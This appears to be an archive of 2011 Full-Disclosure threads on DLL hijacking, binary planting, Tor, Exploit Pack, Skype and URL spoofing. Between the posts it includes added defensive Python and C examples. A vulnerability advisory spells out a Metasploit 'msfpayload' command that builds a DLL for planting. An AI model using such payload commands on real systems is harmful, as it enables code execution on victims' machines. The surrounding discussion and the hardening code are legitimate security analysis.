>>> -Travis
>>>
>>> On Mon, Oct 24, 2011 at 10:31 AM, Mohit Kumar thehackern...@gmail.com wrote:
>>>> French researchers from ESIEA (http://www.esiea.fr/c/en/Web.Esiea.Public.cuke?), a French engineering school, have found and exploited some serious vulnerabilities in the TOR network. They performed an inventory of the network, finding 6,000 machines, many of whose IPs are accessible publicly and directly with the system's source code. They demonstrated that it is possible to take control of the network and read all the messages that circulate. But there are also hidden nodes, the Tor Bridges, which are provided by the system that in some cases. Researchers have developed a script that, once again, to identify them. They found 181. "We now have a complete picture of the topography of Tor", said Eric Filiol.
>>>>
>>>> Read More at The Hacker News -- http://thehackernews.com/2011/10/tor-anonymizing-network-compromised-by.html
>>>>
>>>> --
>>>> Regards,
>>>> Owner, The Hacker News http://www.thehackernews.com/
>>>> "Truth is the most Powerful weapon against Injustice."
Re: [Full-disclosure] New open source Security Framework
On Thu, Oct 6, 2011 at 5:34 AM, root ro...@fibertel.com.ar wrote:
> do not harass people who are writing software for free

Oh, that's rich.
Re: [Full-disclosure] New open source Security Framework
I don't think it's supposed to be a secret. There are also references to Insect Pro in the source code:
https://github.com/exploitpack/trunk/blob/master/Exploit%20Pack/src/com/exploitpack/main/License.java

BTW, you gotta love the scanner :)
https://github.com/exploitpack/trunk/blob/master/Exploit%20Pack/src/com/exploitpack/scanner/ShowDialog.java

On Tue, Oct 4, 2011 at 9:31 PM, Justin Klein Keane jus...@madirish.net wrote:
> insecurityresearch.com (the Insect PRO site) does in fact seem to redirect to exploitpack.com - nice catch Chris.
>
> Justin Klein Keane
> http://www.MadIrish.net
>
> On 10/04/2011 02:46 PM, ctrun...@christophertruncer.com wrote:
>> So this is from the same people that developed Insect Pro?
>>
>> Chris
>>
>> On Tue, 04 Oct 2011 10:42:07 -0500, nore...@exploitpack.com wrote:
>>> Exploit Pack is an open source security framework developed by Juan Sacco. It combines the benefits of a JAVA GUI, Python as Engine and well-known exploits made by users. It has a module editor to make the task of developing new exploits easier, Instant Search and XML-based modules.
>>>
>>> This open source project comes to fill a need: a high quality framework for exploits and security researchers, with a GPL license and Python as engine for its modules.
>>>
>>> - GPL license to ensure the code will always be free
>>> - Instant search built-in for easy access to modules
>>> - Module editor that allows the user to create custom exploits
>>> - Modules use XML DOM, really easy to modify
>>> - Python as Engine because it's the language most used in security related programming
>>>
>>> We are actually working with a social code network; to participate in this project you will only need a GitHub account. Also, I am looking for financial support to keep me coding. If you want to be part of this open source project or just want to collaborate with me: Please reply to jsa...@exploitpack.com
>>>
>>> Why don't you download and give it a try right now? While downloading, you may watch this quick video on YouTube!
>>> Video: http://www.youtube.com/watch?v=cMa2OrB7b5A
>>> Website: http://www.exploitpack.com
Re: [Full-disclosure] Twitter URL spoofing still exploitable
On Tue, Sep 27, 2011 at 3:26 PM, Dan Kaminsky d...@doxpara.com wrote:
>> Ok, now nobody can spoof a URL, but how come a user will tell good URLs and bad ones apart?
>
> Oh boy! Wherever did you get the idea that users can do this?

Jokes apart, I do find it annoying that URLs aren't expanded automatically anymore. But I don't expect this situation to be permanent.
Re: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting
This is a bit old (2007) but it shows this kind of bug perfectly well.
http://securitytracker.com/id/1018588

So I can imagine one scenario in which DLL hijacking would make sense - if the developers neglected to properly set the directory permissions and it got reported as a vuln, the patch *could* have been to properly set the permissions on *files* and forget to set them on the directory. It'd be an extremely stupid way to patch. Then again, it's an extremely stupid bug to begin with, so... :)

On Mon, Sep 26, 2011 at 3:36 AM, Thor (Hammer of God) t...@hammerofgod.com wrote:
> You'd have to be admin to install as a service, and the service would obviously need to then be running as local system to be of benefit (beyond what a normal user could do anyway) AND the installer would have to grant a normal user rights to overwrite it. Certainly possible, but the developer would have to go out of their way to screw that up. And if they did, it still wouldn't be because of the OS...
>
> T
>
> On Sep 25, 2011, at 6:18 PM, Travis Biehn tbi...@gmail.com wrote:
>> GloW: there's a lot of 3rd party software that installs itself as windows services.
>>
>> -Travis
>>
>> On Sun, Sep 25, 2011 at 9:15 PM, GloW - XD doo...@gmail.com wrote:
>>> Haha, too good and too true thor!
>>>
>>>> Maybe he can trick the user into installing on a FAT32 partition first, and THEN get them to execute from a remote share!
>>>
>>> Rofl x10. Agreed, this kind of attack is NOT feasible in 2011, try maybe, 2006. Anyhow it has been a pleasure, ending this BS I think once and for all, look up how winlogon works for one thing, then look at how windows creates and maintains a service_table, and then at the dlls, which are protected ofc, you cannot touch msgina.dll without A LOT of help from a rootkit or something similar, in which case, why would you need to? You could add an admin, hidden, and in a simple batfile script (yes I do have my own code but no it is not for kids..), this is 10 seconds and hidden, so when you have gotten that far, why would you bother to hijack a dll? You CANNOT do crap without complete ADMIN not SYSTEM, ADMIN$ share, and total access to all sockets, meaning, all pipe control and that's where half of windows exchanges smb shares for one thing, you guys don't seem to know CRAP about windows to start with, then have the gall to raise such a frigging ridiculous topic about a non happening, YOUTUBE ONE 'real' event, of this being useful, or, even just working, and I would look but, you won't, cannot, and will never be able to, especially on newer systems of windows7-8. As I said earlier, enjoy your bs DLL hijacking, but ms don't care for it, and whatever patches they instilled don't touch even service_table.. so, they have not given it a high prio, and why should they. This is simply a case of a secteam gaining notoriety, to try and make this a 'big bug!!', to try and gain brownie points from MS. Even tho I don't believe in many things MS, I know the windows system, and how to break it, better than many people, and I can tell you now, this whole DLL hijack is a complete and utter waste of your time. But... keep on going, maybe MS will send you another 'thankyou' email ;)
>>>
>>> xd / http://crazycoders.com / #haxnet@Ef
>>>
>>> On 26 September 2011 10:52, Thor (Hammer of God) t...@hammerofgod.com wrote:
>>>> Maybe he can trick the user into installing on a FAT32 partition first, and THEN get them to execute from a remote share!
>>>>
>>>> On Sep 25, 2011, at 5:30 PM, Travis Biehn tbi...@gmail.com wrote:
>>>>> It might be a fun experiment to see what DLLs they're looking for :.)
>>>>>
>>>>> -Travis
>>>>>
>>>>> On Sun, Sep 25, 2011 at 2:57 PM, kz2...@googlemail.com wrote:
>>>>>> To replace a service executable you usually need administrator access anyway.
>>>>>>
>>>>>> --Original Message--
>>>>>> From: Madhur Ahuja
>>>>>> Sender: full-disclosure-boun...@lists.grok.org.uk
>>>>>> To: security-bas...@securityfocus.com
>>>>>> To: full-disclosure@lists.grok.org.uk
>>>>>> Subject: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting
>>>>>> Sent: 25 Sep 2011 19:31
>>>>>>
>>>>>> Imagine a situation where I have a Windows system with restricted user access and want to get Administrator access. There are many services in Windows which run with the SYSTEM account. If there exists even one such service whose executable is not protected by Windows File Protection, isn't it possible to execute malicious code (such as gaining Administrator access) simply by replacing the service executable with a malicious one and then restarting the service. As a restricted user, what's stopping me from doing this? Is there any integrity check performed by services.msc or
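Mario's scenario above (the binary locked down, its directory left writable) and Thor's condition (the installer would have to grant a normal user write access) are both things an installer or hardening audit can catch before anyone else does. The following Python is an added example, not code from the thread; it takes constructed, icacls-style ACE lines for a SYSTEM service's image file and for its directory and flags the cases where a low-privilege group could replace the binary or drop a DLL beside it. The icacls layout (principal:(flag)(flag)(rights)), the group list and the service inventory are assumptions for the illustration; on a live host the same logic would be fed the output of `icacls` and `sc qc`.

```python
"""Flag SYSTEM services whose image file or image directory is writable by
ordinary users.

Added example for the binary-planting thread, not code from the list. The
point it encodes is Mario's: fixing the ACL on the service *file* while the
*directory* stays writable still lets a standard user plant a DLL next to
the binary. All ACLs below are constructed, icacls-style lines (assumption:
icacls' "principal:(flag)(flag)(rights)" layout, path column omitted).
"""
import re

# Groups an unprivileged interactive user belongs to (assumption for the audit).
LOW_PRIV = {"Everyone", "BUILTIN\\Users", "NT AUTHORITY\\Authenticated Users"}

# icacls rights that allow adding or replacing files in a directory:
# F=full, M=modify, W=write, WD=write data/add file, AD=append/add subdir,
# DC=delete child, WDAC=write DACL, WO=write owner.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "DC", "WDAC", "WO"}

# Inheritance/scope markers that icacls prints in the same parentheses style.
NOT_RIGHTS = {"OI", "CI", "IO", "NP", "I"}

ACE_RE = re.compile(r"^(?P<who>.+?):(?P<groups>(?:\([^)]*\))+)$")


def parse_ace(line):
    """Return (principal, is_allow, rights_set) for one icacls ACE line."""
    m = ACE_RE.match(line.strip())
    if not m:
        raise ValueError(f"not an icacls ACE: {line!r}")
    groups = re.findall(r"\(([^)]*)\)", m.group("groups"))
    is_allow = "DENY" not in groups
    rights = set()
    for g in groups:
        for token in g.split(","):          # specific rights come as (RX,W)
            token = token.strip()
            if token and token not in NOT_RIGHTS and token != "DENY":
                rights.add(token)
    return m.group("who"), is_allow, rights


def low_priv_can_write(ace_lines):
    """True if an allow ACE grants a write-class right to a low-privilege group.

    Deny ACEs are not subtracted: evaluating them correctly needs the full
    ACE order, so the audit errs on the side of reporting a finding.
    """
    for line in ace_lines:
        who, is_allow, rights = parse_ace(line)
        if is_allow and who in LOW_PRIV and rights & WRITE_RIGHTS:
            return True
    return False


def audit_services(services, acls):
    """services: {name: (account, image_path)}; acls: {path: [ACE lines]}.

    Returns (service, path, reason) findings for services running as SYSTEM.
    The file is checked first; the directory check is what catches the
    'patched the file, forgot the directory' case from the thread.
    """
    findings = []
    for name, (account, image) in services.items():
        if account.upper() not in {"LOCALSYSTEM", "NT AUTHORITY\\SYSTEM"}:
            continue
        directory = image.rsplit("\\", 1)[0]
        if low_priv_can_write(acls.get(image, [])):
            findings.append((name, image, "service binary writable by standard users"))
        elif low_priv_can_write(acls.get(directory, [])):
            findings.append((name, directory,
                             "image directory writable: a DLL can be planted next to the protected binary"))
    return findings


# Constructed inventory (what `sc qc` would give) and ACLs (what `icacls` would give).
SERVICES = {
    "GoodSvc":   ("LocalSystem", r"C:\Program Files\GoodSvc\goodsvc.exe"),
    "SloppySvc": ("LocalSystem", r"C:\Program Files\SloppySvc\sloppysvc.exe"),
    "UserApp":   ("NT AUTHORITY\\LocalService", r"C:\Program Files\UserApp\app.exe"),
}
ACLS = {
    r"C:\Program Files\GoodSvc": [
        "NT AUTHORITY\\SYSTEM:(OI)(CI)(F)",
        "BUILTIN\\Administrators:(OI)(CI)(F)",
        "BUILTIN\\Users:(OI)(CI)(RX)",
    ],
    r"C:\Program Files\GoodSvc\goodsvc.exe": [
        "NT AUTHORITY\\SYSTEM:(F)", "BUILTIN\\Administrators:(F)", "BUILTIN\\Users:(RX)",
    ],
    # File ACL was tightened, directory ACL was not (inheritance broken on the file).
    r"C:\Program Files\SloppySvc": [
        "NT AUTHORITY\\SYSTEM:(OI)(CI)(F)",
        "BUILTIN\\Administrators:(OI)(CI)(F)",
        "BUILTIN\\Users:(OI)(CI)(M)",
    ],
    r"C:\Program Files\SloppySvc\sloppysvc.exe": [
        "NT AUTHORITY\\SYSTEM:(F)", "BUILTIN\\Administrators:(F)", "BUILTIN\\Users:(RX)",
    ],
}

if __name__ == "__main__":
    for finding in audit_services(SERVICES, ACLS):
        print(*finding, sep=" | ")
```

Only SloppySvc is reported, and only because of its directory; its binary looks fine on its own, which is exactly why a check that stops at the executable's ACL would miss it.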
Re: [Full-disclosure] Cybsec Advisory 2011 0901 Windows Script Host DLL Hijacking
Paul, Those file extensions correspond to scripts. If a file contains a script that runs when the file is double clicked, and the scripting engine is not sandboxed (meaning the script can do the same things an executable file can do) then the attack is meaningless. You can simply have the script inside the file do malicious things instead of planting a DLL. Binary planting, regardless of the discussion about it being a vulnerability or not, in any case only makes sense when the file only contains static data, or when the file contains executable code that would normally not have the same privileges as a standard executable file. (A script that doesn't get executed when double clicking on it -for example if a text editor is opened instead- would be the same case as in a data file). I've never used .js or .jse scripts on Windows, but all the other extensions are patently not sandboxed scripts. In fact, the Windows Script Host software is mostly used to write system maintenance scripts, so it's obvious its scripts can't be restricted or they'd be useless. I'm guessing the same applies to .js and .jse then, and of course I wouldn't mind seeing proof that it doesn't. However the links you provided don't really prove anything (the first one even says this is not a complete list, and I admit I've only glanced the second one but it seems unrelated, as it applies to file transfers on Microsoft Sharepoint). Planting a DLL file to be executed at the same time as other executable file is just a convoluted way of doing the same thing. It *may* be used in some strange, artificial situations, but I'm not convinced there aren't better ways to do it, and in any case it doesn't justify an advisory. And judging from what the timeline reads, I believe Microsoft simply ignored this one. 
I hope my explanation helped :) -Mario On Mon, Sep 5, 2011 at 12:54 AM, paul.sz...@sydney.edu.au wrote: Application: wscript.exe Extensions: js, jse, vbe, vbs, wsf, wsh Library: wshesn.dll Many people commented that the above extensions are executable already, so are (should be) treated with caution, or that they can be trojaned directly without any DLL load shenanigans. However... looking at http://technet.microsoft.com/en-us/library/cc288335%28office.12%29.aspx http://office.microsoft.com/en-us/windows-sharepoint-services-help/types-of-files-that-cannot-be-added-to-a-list-or-library-HA010100147.aspx I do not see JS listed as executable, though JSE is listed. Looking at http://msdn.microsoft.com/en-us/library/ms722429.aspx I see JS (but not JSE) listed. Checking secpol.msc on my Windows XP machine, none of the above extensions are designated. Maybe DLL hijacking is useful for some of these file types, after all? Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of Sydney, Australia ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.”
Re: [Full-disclosure] Cybsec Advisory 2011 0901 Windows Script Host DLL Hijacking
On Mon, Sep 5, 2011 at 7:45 PM, root ro...@fibertel.com.ar wrote: Off-topic: First Insect PRO, and now this? What's happening, fellow Latin Americans? Our standards are falling. Please behave, this is the Internet! [image: The_Internet_is_Serious_Business - Low.jpg]
Re: [Full-disclosure] Cybsec Advisory 2011 0901 Windows Script Host DLL Hijacking
Are you guys seriously reporting that double clicking on a malicious .vbs file could lead to remote code execution? :P Either I'm missing something (and I'd welcome a rebuttal here!) or you might as well add .exe to that list. All those extensions are already executable. On Fri, Sep 2, 2011 at 7:35 PM, CYBSEC Labs cybsecl...@cybsec.com wrote: Advisory Name: Windows Script Host DLL Hijacking Internal Cybsec Advisory Id: 2011-0901-Windows Script Host DLL Hijacking Vulnerability Class: Remote Command Execution Vulnerability Release Date: September 2, 2011 Affected Applications: Windows Script Host v5.6; other versions may also be affected Affected Platforms: Any running Windows Script Host v5.6 Local / Remote: Remote / Local Severity: High – CVSS: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C) Researcher: Juan Manuel Garcia Vendor Status: Acknowledged Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerability_policy.pdf Vulnerability Description: DLL Hijacking takes advantage of the way an application dynamically loads DLL libraries without specifying a fully qualified path. This is usually done by invoking the LoadLibrary and LoadLibraryEx functions to dynamically load DLLs. In order to exploit this vulnerability a user must open a file with an extension associated to the vulnerable application. A malicious DLL, named exactly as a DLL the application loads using the vulnerable function, must be placed in the same directory as the opened file. The application will then load the malicious DLL instead of the original, thus executing the malicious code. The following application loads external libraries following an insufficiently qualified path. Application: wscript.exe Extensions: js, jse, vbe, vbs, wsf, wsh Library: wshesn.dll Exploit: Option 1 - Using the “msfpayload” Metasploit module as shown below: msfpayload windows/exec CMD=calc.exe D > exploit.dll Option 2 - Using the “webdav_dll_hijacker” Metasploit module.
Impact: A successful exploit of this vulnerability leads to arbitrary code execution. Vendor Response: 2011/08/09 – Vulnerability was identified. 2011/08/19 – Cybsec sent detailed information on the issue and a Proof of Concept. 2011/08/19 – Vendor stated: “As a matter of policy, we cannot comment on ongoing investigations”. 2011/08/19 – Vendor was informed that the security advisory would be published after 15 days. 2011/09/02 – Vulnerability was released. Contact Information: For more information regarding the vulnerability feel free to contact the researcher at jmgarcia at cybsec dot com About CYBSEC S.A. Security Systems Since 1996, CYBSEC has been engaged exclusively in rendering professional services specialized in Information Security. Their area of services covers Latin America and Spain, and over 250 customers are proof of their professional life. To keep objectivity, CYBSEC S.A. does not represent, sell, or associate with other software and/or hardware provider companies. Our services are strictly focused on Information Security, protecting our clients from emerging security threats, keeping their IT deployments available, safe, and reliable. Beyond professional services, CYBSEC is continuously researching new defense and attack techniques and contributing to the security community with high quality information exchange. For more information, please visit www.cybsec.com (c) 2011 - CYBSEC S.A. Security Systems
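The loading pattern the advisory describes, and the fix the advisory does not spell out, as an added example that is not part of CYBSEC's advisory, of Windows Script Host, or of any code on this page. For the Windows Script Host case the replies above stand: a script that already runs with the user's rights gains nothing from a planted DLL. The fix still matters for applications that open plain data files. All function names here are mine; wshesn.dll and the System32 directory are used only as illustrative inputs, and the 64-byte and 512-byte buffers are assumptions. The Windows-only part compiles under _WIN32; the path checks compile anywhere.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#ifdef _WIN32
#include <windows.h>
/* Documented value; present in SDKs from Windows 8 on and honoured at run time
   on Windows 7/Vista with KB2533623 installed. Older loaders reject the flag,
   which load_dll_safe reports as NULL rather than silently falling back. */
#ifndef LOAD_LIBRARY_SEARCH_SYSTEM32
#define LOAD_LIBRARY_SEARCH_SYSTEM32 0x00000800
#endif
#endif

/* 1 when the path is fully qualified in Windows terms: a drive-letter form
   such as C:\Windows\System32\wshesn.dll, or a UNC form \\server\share\...
   A bare name such as "wshesn.dll" returns 0; handed to LoadLibrary as-is it
   goes through the default search order, which on an unhardened process
   includes the current directory, i.e. the folder the document was opened from. */
int is_fully_qualified(const char *path)
{
    size_t n = strlen(path);
    if (n >= 3 && isalpha((unsigned char)path[0]) && path[1] == ':' &&
        (path[2] == '\\' || path[2] == '/'))
        return 1;
    if (n >= 2 && path[0] == '\\' && path[1] == '\\')
        return 1;
    return 0;
}

/* Builds "<system_dir>\<name>" for a bare library name. Names carrying a
   directory component or a drive are refused, so a caller cannot redirect
   the load with "..\evil.dll". Returns 0 on success, -1 on rejection or when
   the output buffer is too small. */
int qualify_system_dll(const char *system_dir, const char *name,
                       char *out, size_t out_len)
{
    if (name[0] == '\0' || strpbrk(name, "\\/:") != NULL)
        return -1;
    int w = snprintf(out, out_len, "%s\\%s", system_dir, name);
    if (w < 0 || (size_t)w >= out_len)
        return -1;
    return is_fully_qualified(out) ? 0 : -1;
}

#ifdef _WIN32
/* The pattern the advisory describes: bare name, default search order. */
HMODULE load_dll_unsafe(const char *name)
{
    return LoadLibraryA(name);
}

/* Hardened: resolve to System32 ourselves, then also restrict where the
   loader resolves the DLL's own dependencies. */
HMODULE load_dll_safe(const char *name)
{
    char sysdir[MAX_PATH], path[MAX_PATH];
    if (GetSystemDirectoryA(sysdir, sizeof sysdir) == 0)
        return NULL;
    if (qualify_system_dll(sysdir, name, path, sizeof path) != 0)
        return NULL;
    return LoadLibraryExA(path, NULL, LOAD_LIBRARY_SEARCH_SYSTEM32);
}
#endif

int main(int argc, char **argv)
{
    /* Stand-alone demo: classify each name given on the command line.
       The System32 path is hardcoded here only for the portable demo. */
    char out[512];
    for (int i = 1; i < argc; i++) {
        if (is_fully_qualified(argv[i]))
            printf("%-40s fully qualified, safe to hand to LoadLibrary\n", argv[i]);
        else if (qualify_system_dll("C:\\Windows\\System32", argv[i], out, sizeof out) == 0)
            printf("%-40s bare name, would be resolved to %s\n", argv[i], out);
        else
            printf("%-40s rejected (contains a path component)\n", argv[i]);
    }
    return 0;
}
```

The process-wide equivalent of the per-call flag is SetDefaultDllDirectories(LOAD_LIBRARY_SEARCH_DEFAULT_DIRS) early in startup, which removes the current directory from the search order for every later LoadLibrary in the process.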
Re: [Full-disclosure] Cybsec Advisory 2011 0901 Windows Script Host DLL Hijacking
If it's a trusted .vbs then how would you drop a .dll in the same directory? If you have write permissions it's easier to just modify the .vbs. You might as well claim the added value is to backdoor a .vbs file surreptitiously so it doesn't show when inspecting the source code. But it doesn't add that much, really, since a new and mysterious .dll file would also draw attention, so it's probably easier to hide malicious intent in the source code by obfuscating it. On Fri, Sep 2, 2011 at 11:53 PM, Nahuel Grisolia nah...@bonsai-sec.com wrote: List, On 09/02/2011 06:45 PM, root wrote: You don't get the worst part: unsuccessful exploitation also leads to code execution. Scary stuff. On 09/02/2011 05:05 PM, Mario Vilas wrote: Are you guys seriously reporting that double clicking on a malicious .vbs file could lead to remote code execution? :P Either I'm missing something (and I'd welcome a rebuttal here!) or you might as well add .exe to that list. All those extensions are already executable. I think that they're talking about executing a trusted vbs that could lead to the execution of malicious code. :S regards, -- Nahuel Grisolia - C|EH Information Security Consultant Bonsai Information Security Project Leader http://www.bonsai-sec.com/ (+54-11) 4777-3107
Re: [Full-disclosure] Cybsec Advisory 2011 0901 Windows Script Host DLL Hijacking
I disagree. If this so called vulnerability had any added value in terms of social engineering, it would actually make sense to report it. Social engineering isn't bad, I really don't care how leet it is. My claim is simpler: this advisory makes no sense at all, because it replaces an easy way of exploitation with a hard way of exploitation, so its added value is actually *negative* for the attacker. Most likely whoever found this is new to the infosec world and never stopped to consider these details - he/she just blindly repeated what the dll injection crowd was doing and posted whatever results were found, without really understanding what was going on. And THAT is the state of infosec today. People who report stuff for the sake of reporting, without really understanding how things work or why. On Fri, Sep 2, 2011 at 11:46 PM, valdis.kletni...@vt.edu wrote: On Fri, 02 Sep 2011 20:55:35 -, Thor (Hammer of God) said: LOL. Warning, if you get the user to execute code, then it is possible to get the user to execute code!! All you have to do is get files on their system, and then get them to execute those files! Note that once you get the user to execute the code, it will actually run in the context of that user!! This is a remote code execution vulnerability! Welcome to today's Infosec! The sad part is that this is the future of infosec as well. Microsoft got the security religion a few years back, and even I have to admit their current stuff isn't that bad at all. The various Linux distros are (slowly) getting their acts together, and maybe even Apple and Adobe will see the light sometime reasonably soon. Yes, there will still be software failures - but once the effort of finding a new 0-day reaches a certain point, the economics change. And once that happens, social engineering will become an even bigger part of both the attack and defense sides of infosec.
For the black hats, the cost/benefit of looking for effective 0-day holes will continue to drop, while the cost/benefit of phishing a user will remain steady - so that's a push towards more social engineering. Why go to the effort of spending 3 months finding a browser bug that allows you to push malware to the victim's machine, when you can just spend 45 minutes creating a "Your machine is infected - click here to fix it" pop-up that will catch 80% of the people? Meanwhile, as the software gets more hardened and patching is more automated, the white hats will find a bigger percent of their time is spent defending their systems from attacks triggered by their own users. Because the failure rate of people's brains is already about 4.7*10**9 times as high as the software failure rate, and the ratio is only getting worse - software is improving, people aren't. Prediction 1: 10 years from now, organized crime will be hiring cognitive psychologists to help design more effective phish the way they currently hire programmers to write better spambots. Prediction 2: It ain't gonna get better till the average IQ starts going up faster than the software improves.
Re: [Full-disclosure] INSECT Pro - Free tool for pentest - New version release 2.7
On Sat, Aug 27, 2011 at 4:27 AM, GloW - XD doo...@gmail.com wrote: when is someone going to warez this... it ain't free.. http://www.insecurityresearch.com/files/
Re: [Full-disclosure] Skype 5.3.*.5.2.* Critical Pointer Vulnerability
Perhaps you should post the contents of the advisory here as well. Many people won't happily click on a link without any explanations. On Mon, Aug 22, 2011 at 9:14 PM, Levent Kayan levonka...@gmx.net wrote: hello, http://vulnerability-lab.com/get_content.php?id=180 cheers, noptrix -- Name: Levent 'noptrix' Kayan E-Mail: nopt...@lamergarten.net GPG key: 0x014652c0 Key fingerprint: ABEF 4B4B 5D93 32B8 D423 A623 823D 4162 0146 52C0 Homepage: http://www.noptrix.net/
Re: [Full-disclosure] Skype 5.3.*.5.2.* Critical Pointer Vulnerability
Oh, and BTW...

--- Violation Exception Log ---
0:034> g
(f10.ed4): Unknown exception (first chance)
(f10.ed4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=c07ca54b ebx=a96959bc ecx=d8f10db2 edx=0000155f esi=d7263481 edi=3e294540
eip=25c50116 esp=37f91000 ebp=50601616 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
25c50116 cd01            int     1
0:000> !exchain
0018e8f8: Skype+8be3a0 (00cbe3a0)

This doesn't look like an exploitable buffer overflow to me. I think you just stumbled upon Skype's anti-debug measures. On Tue, Aug 23, 2011 at 1:02 AM, Mario Vilas mvi...@gmail.com wrote: Perhaps you should post the contents of the advisory here as well. Many people won't happily click on a link without any explanations. On Mon, Aug 22, 2011 at 9:14 PM, Levent Kayan levonka...@gmx.net wrote: hello, http://vulnerability-lab.com/get_content.php?id=180 cheers, noptrix -- Name: Levent 'noptrix' Kayan E-Mail: nopt...@lamergarten.net GPG key: 0x014652c0 Key fingerprint: ABEF 4B4B 5D93 32B8 D423 A623 823D 4162 0146 52C0 Homepage: http://www.noptrix.net/
Re: [Full-disclosure] [Security Tool - Video] INSECT Pro 2.6.1 available
Insect Pro - Now with an integrated 1.21 gigawatt Flux Capacitor! If you make a pentest at 88 miles per hour you can go back in time! On Wed, Aug 3, 2011 at 3:17 AM, root ro...@fibertel.com.ar wrote: Dude you just released INSECT Pro 2.7 less than a week ago. I swear to god I'm being serious. On 08/02/2011 08:48 PM, Juan Sacco wrote: INSECT Pro 2.6.1 is available worldwide right now. Check the new cool features: http://www.youtube.com/watch?v=EcgPMyjHVbQ
* Run Faster: Because making good security testing is not enough
* Load Better: Major graphical interface and optimisation features were implemented
* Module Search: This version includes a new built-in search feature
* Improvements and Changes: Many more optimisations and updates were added
* Lots of bugs were patched
Start here: http://www.insecurityresearch.com Regards Juan Sacco -- _ Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com Insect Pro 2.6.1 was released, stay tuned
Re: [Full-disclosure] URL Spoofing vulnerability in different browsers
Don't worry, we all know MustLive is lying, as usual. On Fri, Jul 22, 2011 at 10:08 PM, Chris Evans scarybea...@gmail.com wrote: On Fri, Jul 22, 2011 at 8:36 AM, MustLive mustl...@websecurity.com.ua wrote: Hello list! I want to warn you about a URL Spoofing vulnerability in Mozilla Firefox, Internet Explorer, Google Chrome, Opera and other browsers. I found it a long time ago, on the 6th of February 2008, just after finding the built-in CSRF vulnerability in Mozilla and Firefox (it's a funky CSRF attack via the prefetching functionality), which I described at my site in March. - Affected products: - Vulnerable are all browsers which support Basic/Digest Authentication. That is all modern browsers and many older browsers. In particular affected are Mozilla Firefox 3.0.19, 3.5.11, 3.6.8, Firefox 4.0b2 (and Mozilla and all other Gecko-based browsers), Internet Explorer 6, 7, 8, Google Chrome 1.0.154.48 and Opera 10.62, and previous and next versions of these browsers. And other browsers which support Basic/Digest Authentication. In March, after I informed them, Mozilla opened Bug 647010 in Bugzilla (https://bugzilla.mozilla.org/show_bug.cgi?id=647010). Among the four browser developers informed by me only Mozilla said that they are planning to fix this vulnerability (without specifying the time). Google didn't even answer me, but in June they announced in their blog (http://blog.chromium.org/2011/06/new-chromium-security-features-june.html) that they fixed this vulnerability in Chrome 13 (now the beta version) and higher. -- Details: -- This is better called an attack than a vulnerability, because it uses built-in browser functionality (and its intended behavior) to attack users of web sites.
This attack allows conducting phishing attacks on users of web sites - in this case the phishing is done not at other (phishing) sites, nor by using holes in target sites (like reflected XSS or persistent XSS), but by using browser functionality (and the allowed functionality of target sites to place external content). I called this attack Onsite phishing (or Inline phishing). It can be used (including by phishers) for stealing logins and passwords of users of web sites. As I've tested, a lot of different methods (using tags and CSS) which allow making cross-site requests can be used to conduct this attack. Except prefetching (in all Gecko-based browsers which support the prefetching functionality), which doesn't show the Authentication window on receiving a 401 response from the web server. The next methods can be used: Tags img, script, iframe, frame, embed, link (css) - Mozilla, Firefox, IE, Google Chrome and Opera. Tag object - Internet Explorer, Google Chrome and Opera. CSS (inline, in html files, in external css files): such as -moz-binding:url - Mozilla and Firefox 3.0, such as background-image:url - in all browsers. Here are screenshots of the attack in different browsers (in Firefox 3.0.19, 3.5.x, 3.6.x, 4.0b2 the dialog window looks almost the same): http://websecurity.com.ua/uploads/2011/03/Attack%20on%20Mozilla.png http://websecurity.com.ua/uploads/2011/03/Attack%20on%20Firefox.png http://websecurity.com.ua/uploads/2011/03/Attack%20on%20IE6.png http://websecurity.com.ua/uploads/2011/03/Attack%20on%20IE7.png http://websecurity.com.ua/uploads/2011/03/Attack%20on%20IE8.png http://websecurity.com.ua/uploads/2011/03/Attack%20on%20Chrome.png http://websecurity.com.ua/uploads/2011/03/Attack%20on%20Opera.png The attack can be made as reflected at the target site, or as persistent (using allowed functionality at the target site which allows putting some tags, like the img tag).
The persistent attack is more dangerous (and this type of attack is shown in the screenshots). And there are millions of web sites which allow such user generated content (like img tags), which can lead to such persistent attacks. Timeline: 2011.03.26 - announced at my site. 2011.03.31 - informed Mozilla, Microsoft, Google and Opera. 2011.04.01 - Mozilla answered and opened an entry in Bugzilla (https://bugzilla.mozilla.org/show_bug.cgi?id=647010). 2011.04.01 - Microsoft answered and asked for more details. 2011.04.03 - gave additional details to Microsoft. But they ignored fixing it, like Google and Opera did. 2011.06.14 - Google hiddenly and lamerly fixed this hole in Chrome 12 beta (and future versions), without answering and thanking me for informing. Which is lame behavior and I don't respect companies with such behavior. But this Google's step should force other browser developers to fix this vulnerability in their products. FWIW -- no, Chrome Security Team does not operate that way, and you should be well aware of that! In case you weren't, please check out the Hall of Fame: http://dev.chromium.org/Home/chromium-security/hall-of-fame As can be seen, we have a long
Re: [Full-disclosure] Binary Planting Goes Any File Type
